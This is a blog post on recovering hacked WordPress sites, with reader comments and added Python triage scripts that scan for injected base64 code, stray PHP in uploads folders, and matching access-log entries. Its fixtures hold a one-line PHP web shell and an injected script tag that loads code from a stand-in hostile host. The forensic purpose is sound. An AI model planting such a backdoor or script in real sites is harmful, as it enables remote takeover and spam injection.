Seems like more and more, I see people having a terrible time with their WordPress installs being hacked. While I’m no expert on the internets, or security, or anything like that….I did suffer through 2 rounds of attacks here on The Voodoo Empire, and recovered fully….and learned a lot. So here is the process I went through. The first time I wasn’t thorough enough, and that is how it happened again. I’ve been clean for months now, after doing things properly the second time. Before I describe my process, here are some great reads that pretty much set me straight and got me going on the cleanup process.
These got me going through the cleanup process, plus one other good link for after you get everything cleaned up:
So that’s the required reading out of the way….now onto my process.
I first noticed some gibberish (the base64 stuff: a long encoded string that the injected code decodes and hands to eval) showing up in my theme’s files when I went in to do some editing. It had been months since I had worked on my theme, so who knows how long the spam had been in there. I deleted all the rogue code from all my theme’s files and thought I was golden. Until it showed up again. I played the find-and-delete game for some time… but it kept coming back. Then I started to dig around some more… The Voodoo Empire has 5 WordPress installs, and at the time we had Drupal, Joomla, ZenCart, MediaWiki, and many other software packages. That totals up to a few thousand PHP files on the server. Each and every PHP file had the base64 stuff in it. So next up, every PHP file was either cleaned or replaced. I thought I had it beat. A month later it was back. By now I’d developed the habit of viewing my source code from within my browser each time I visited my websites, to look for bad stuff. But this time, even though there was spam in my source code, no files had been altered. So I dug and dug, and finally found a PHP file that didn’t belong, buried about four levels deep. It was inserting spam links. I deleted it and thought I was good. But alas, it was too good to be true… soon, all the PHP files on my server got altered again. This time though, I did some research and finally cleaned up properly.
First thing I did was change all my passwords: FTP, WP (and all other programs), all DB passwords, etc. After I changed all my passwords, I took a look at one of the files that had been altered and checked out its timestamp. My host (GoDaddy) offers server access logs to peruse at my leisure (if you’ve never seen an access log, they are scary). I had no idea what was in a log, I’d never seen one, but I decided to dive in. I checked my access logs against the times that the altered files had last been changed, and found that a rogue PHP file buried way deep in the 2008 uploads folder of a different WP install was affecting my main WP install. (Under a single hosting account every install runs as the same user, so a backdoor in one site can write to the files of all the others.) Upon further investigation, I found another rogue PHP file that was altering my other files. So I deleted the rogue PHP files. I then reinstalled every single software package on my server. Then I went in and manually cleaned the rest of the PHP files that didn’t get replaced (WP theme files, the wp-config file, etc.). After that it was on to plugins. I deleted all plugins and installed them from clean downloads. So now every PHP file on my server was accounted for, and clean. No rogue PHP files existed anywhere. No rogue code was added on to any of my existing PHP files.
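The three checks above (find every PHP file carrying a base64 blob and see what it decodes to, find any PHP file sitting in a wp-content/uploads folder where none should ever be, and pull the access-log lines logged within a few minutes of a file’s modification time) can be scripted. What follows is an added example, not the post author’s tooling: it assumes the whole hosting account is one directory tree and that the host’s access log is in Apache combined format, and every file, log line and IP address in it is constructed for the demo.

```python
"""Triage helpers for a hacked shared-hosting account (added example, not the
post's own tooling).  Assumes one directory tree holds every install and that the
access log is Apache combined format; every file and log line is constructed."""
import base64, os, re, tempfile, zlib
from datetime import datetime, timedelta, timezone

# The classic injected header: eval(base64_decode('...')), sometimes inside gzinflate().
INJECT_RE = re.compile(
    r"eval\s*\(\s*(?P<gz>gzinflate\s*\(\s*)?base64_decode\s*\(\s*['\"](?P<b64>[A-Za-z0-9+/=]+)['\"]")
# Apache combined log line: ip ident user [time] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def find_injected_php(root):
    """[(path, decoded payload prefix)] for PHP files carrying an eval(base64_decode()) blob.
    Decoding shows what the blob does; it says nothing about how it got there."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                m = INJECT_RE.search(fh.read().decode("latin-1"))
            if not m:
                continue
            try:
                data = base64.b64decode(m.group("b64"))
                if m.group("gz"):
                    data = zlib.decompress(data, -15)  # gzinflate() is raw DEFLATE
                payload = data.decode("latin-1")
            except (ValueError, zlib.error):
                payload = "<undecodable>"
            hits.append((os.path.relpath(full, root).replace(os.sep, "/"), payload[:60]))
    return sorted(hits)

def find_php_in_uploads(root):
    """PHP files anywhere under a wp-content/uploads tree.  WordPress keeps no PHP of
    its own there, so anything found is a dropped file, whatever it is named."""
    rogue = []
    for dirpath, _, files in os.walk(root):
        if "wp-content/uploads" not in dirpath.replace(os.sep, "/"):
            continue
        rogue += [os.path.relpath(os.path.join(dirpath, f), root).replace(os.sep, "/")
                  for f in files if f.lower().endswith((".php", ".php5", ".phtml"))]
    return sorted(rogue)

def requests_near(log_lines, when, window=timedelta(minutes=5)):
    """Requests logged within `window` of a file's mtime (`when`, a tz-aware datetime).
    A POST to a .php under uploads just before the mtime is the smoking gun."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        if abs(ts - when) <= window:
            out.append((m.group("ip"), m.group("method"), m.group("path"), m.group("status")))
    return out

def build_sample_tree():
    """Constructed fixture: an injected theme file, a clean one, a backdoor dropped in
    the old uploads folder of a second install, and an ordinary image beside it."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    spam = b"<?php echo '<a href=\"http://spam.invalid\">cheap pills</a>';"
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(c.compress(spam) + c.flush()).decode()
    files = {
        "wp-content/themes/voodoo/footer.php":
            f"<?php eval(gzinflate(base64_decode('{blob}'))); ?>\n<footer>ok</footer>\n",
        "wp-content/themes/voodoo/header.php": "<?php wp_head(); ?>\n",
        "oldblog/wp-content/uploads/2008/06/img.php":
            "<?php eval(base64_decode($_POST['c'])); ?>\n",  # runs whatever is POSTed to it
        "oldblog/wp-content/uploads/2008/06/photo.jpg": "not really a jpeg\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root

# Constructed log (documentation IPs): the attacker POSTs to the backdoor, then
# fetches the freshly rewritten footer; the other two lines are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Mar/2010:02:51:52 -0700] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [14/Mar/2010:03:14:07 -0700] "POST /oldblog/wp-content/uploads/2008/06/img.php HTTP/1.1" 200 412 "-" "-"
198.51.100.23 - - [14/Mar/2010:03:14:09 -0700] "GET /wp-content/themes/voodoo/footer.php HTTP/1.1" 200 0 "-" "-"
203.0.113.7 - - [14/Mar/2010:09:40:01 -0700] "GET /feed/ HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
""".splitlines()
FOOTER_MTIME = datetime(2010, 3, 14, 3, 14, 8, tzinfo=timezone(timedelta(hours=-7)))  # assumed mtime

if __name__ == "__main__":
    root = build_sample_tree()
    print(find_injected_php(root))
    print(find_php_in_uploads(root))
    print(requests_near(SAMPLE_LOG, FOOTER_MTIME))
```

Two things worth noticing in the run. The constructed backdoor under uploads never matches the base64 pattern, because it decodes whatever is POSTed to it rather than a literal string; that is exactly why the uploads listing is a separate check and why a string scan alone can leave the dropper in place. And the log correlation only works if you read the timestamp from the altered file with the same timezone the host writes into its logs, so check both before trusting a “nothing happened near that time” result.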
It was time to finish things up… on to the database. I manually scanned through exports of my database looking for the same suspicious code I had found in the files, ran some basic SQL queries on my existing database looking for suspicious code, and got my database all squeaky clean. And now, with everything nice and clean, I changed all my passwords once again (any password changed while a backdoor was still on the server has to be treated as exposed).
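The database pass can be scripted the same way. This is an added example, not the queries the post’s author ran: it loads a constructed wp_posts / wp_options fixture into sqlite3 and runs the LIKE scans a practitioner would otherwise paste into phpMyAdmin; mysql_queries() returns those same statements as literal SQL for a real MySQL database. The marker list and the sample rows are assumptions made for the demo.

```python
"""Scan a WordPress database for injected markup (added example, not the post's own
queries).  Runs against a constructed sqlite3 fixture so it works offline; the LIKE
clauses are plain SQL and work unchanged against MySQL wp_posts / wp_options."""
import sqlite3

# Strings that almost never belong in a post body or option value but turn up in
# injected spam and droppers.  Lower-case: LIKE is case-insensitive in both engines.
MARKERS = ["<script", "<iframe", "base64_decode", "eval(", "display:none",
           "visibility:hidden"]

SCHEMA = """
CREATE TABLE wp_posts   (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT, post_status TEXT);
CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
"""

# Constructed rows: a clean post, one carrying a hidden spam-link block, a draft,
# a normal siteurl, and a text widget edited to pull in a remote script.
FIXTURE_POSTS = [
    (1, "Hello world", "<p>Welcome to The Voodoo Empire.</p>", "publish"),
    (2, "Theme update",
     '<p>New footer.</p><div style="display:none"><a href="http://spam.invalid">pills</a></div>',
     "publish"),
    (3, "Draft", "<p>nothing here</p>", "draft"),
]
FIXTURE_OPTIONS = [
    (1, "siteurl", "https://www.rvoodoo.com"),
    (2, "widget_text",
     'a:1:{i:2;a:1:{s:4:"text";s:48:"<script src="http://evil.invalid/x.js"></script>";}}'),
]

def load_fixture():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?,?)", FIXTURE_POSTS)
    conn.executemany("INSERT INTO wp_options VALUES (?,?,?)", FIXTURE_OPTIONS)
    return conn

def _like_clause(column, markers):
    # One LIKE per marker.  '_' inside a marker is a single-char wildcard, which only
    # widens the net a little and is harmless for triage.
    return " OR ".join(f"{column} LIKE ?" for _ in markers), [f"%{m}%" for m in markers]

def _first_marker(text, markers):
    return next((m for m in markers if m in text.lower()), "?")

def suspicious_posts(conn, markers=MARKERS):
    """[(ID, post_title, marker)] for posts of any status whose body contains a marker."""
    where, params = _like_clause("post_content", markers)
    rows = conn.execute(f"SELECT ID, post_title, post_content FROM wp_posts WHERE {where}", params)
    return [(pid, title, _first_marker(body, markers)) for pid, title, body in rows]

def suspicious_options(conn, markers=MARKERS):
    """[(option_name, marker)]; widgets and theme settings live here as serialized PHP."""
    where, params = _like_clause("option_value", markers)
    rows = conn.execute(f"SELECT option_name, option_value FROM wp_options WHERE {where}", params)
    return [(name, _first_marker(val, markers)) for name, val in rows]

def mysql_queries(markers=MARKERS):
    """The same two scans as literal SQL, ready to paste into phpMyAdmin."""
    def ors(col):
        return " OR ".join(f"{col} LIKE '%{m}%'" for m in markers)
    return [f"SELECT ID, post_title FROM wp_posts WHERE {ors('post_content')};",
            f"SELECT option_name FROM wp_options WHERE {ors('option_value')};"]

if __name__ == "__main__":
    db = load_fixture()
    print(suspicious_posts(db))
    print(suspicious_options(db))
    print("\n".join(mysql_queries()))
```

The scan deliberately includes drafts and unpublished posts: injected content parked in a draft does not show on the site, so “view source” never reveals it, but it is still there to be republished. Treat a hit on wp_options with extra suspicion, since serialized widget and theme settings are rendered into every page.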
There you have it! My long and painful travel to a clean WP. Keep everything up to date: WP installs, themes, plugins, etc. Check your pages’ source code often. Maybe install some of the various security plugins that are out there (none of them stopped my attacks, but they do have a use). And if you do get hacked… be thorough. If you are not, you are just wasting your time! Remember, server access logs can be your friend! Hopefully you can avoid being hacked; if you are reading this because it happened to you, I hope I helped you just a little. Be patient, be thorough, and good luck!
Check out my post here if you are looking for more information on rogue files, and using your access logs to find them.
This happened to my website too :(( And thank you so much for posting your experience online. I also have my site hosted by GoDaddy. My question though: I already went to the GoDaddy access log, but can you share with me what the rogue PHP files look like? I have no programming experience at all and this is a very scary experience. Here's my site address that has the problem: http://www.sci-health.org
Thank you so much for your insights on this.
Well, I hope I can help you out just a little. My reply is a bit too long to make as a comment, so I will make a new post here on https://www.rvoodoo.com about how to use your access logs. Hope it helps!
Ohh, awesome!! Thank you so much, you definitely helped a lot!!
Sweet! I’m glad! Nobody wants a hacked site!
Rev. Voodoo thanks for sharing your unbelievable, but so true, story with us. I have heard so many people go through this same thing time and time again.
You’re right, you didn’t get all the files removed, so it replicated itself. It’s such a nightmare and I feel for you!
I wanted to give you a bit of time saving advice. Since you’re on addy, you have access to the “File Manager.” It has a snapshot/copy of each and every single file/directory for the last 30 days of your entire hosting account. Once you figure out what day you were hacked, you simply go to “History” and “Restore” each directory to the day before.
Important – You have to delete ALL the files on the “Current” tab first so it will remove everything that may have been infected. Your site will be down during this process, but it doesn’t take very long.
You can find out more on how to do this at http://community.godaddy.com/help/2009/02/02/restoring-a-linux-hosting-account/
Also, you might want to try using the WordPress File Monitor that will email you whenever one of your site files changes.
Sweet, thanks for the suggestions! I wasn’t actually all that familiar with the GoDaddy history business… that’s cool, I’ll hafta look into it! I’ll check out the plugin too… that could be cool.
I had this same problem… I’m so glad I found WPsecurityLock’s comment. It was extremely helpful and saved me days. I had no clue GoDaddy stored so much information about files.
I got hacked, and I have Linux on GoDaddy with WordPress – even with an up-to-date WordPress version. It screwed my dashboard and messed up the website. It’s down now… it really sucks. Whoever is behind this, please arrest them!!
Hey there, good article. I linked to your site.. I was writing an article on WordPress security plugins, and added you for extra reading. – http://moneydiary.net/secure-wordpress/
Thank you! I was cruising around your site….. a lot of good info there! I’ll definitely be checking it out some more!
You neither need to exchange files, nor to re-install WP, nor to remove code by hand; you’ll find 2 cleanup scripts on my website.
Rename those 2 tiny files to whatever you like.
Put them in your domain’s root, run both files via Browser and see and fix the infected files.
Greetinx from Austria,
Seems cool! I prefer to investigate things manually, and then do my own cleanup. But if your tools work, and are helpful to others…. that’s great!
I can attest that this tool works very well – it seems to have cured this worm on several of my WordPress installations (at least for now – who knows if it will come back). I’m on a shared server with about 25 WP installations, so manually removing this would have taken me forever!
Excellent, thanks for letting us know you had success with that tool!
Thanks for sharing this site!
No problem! I hope my article was helpful… if you need further help, check out my WP specific site at voodoopress.com, I have plenty of articles there, and try to answer all comments and requests!
here is an online base64 decode tool http://base64decode.net
Decoding the base64 might be interesting, but the important thing is more how it got there in the first place.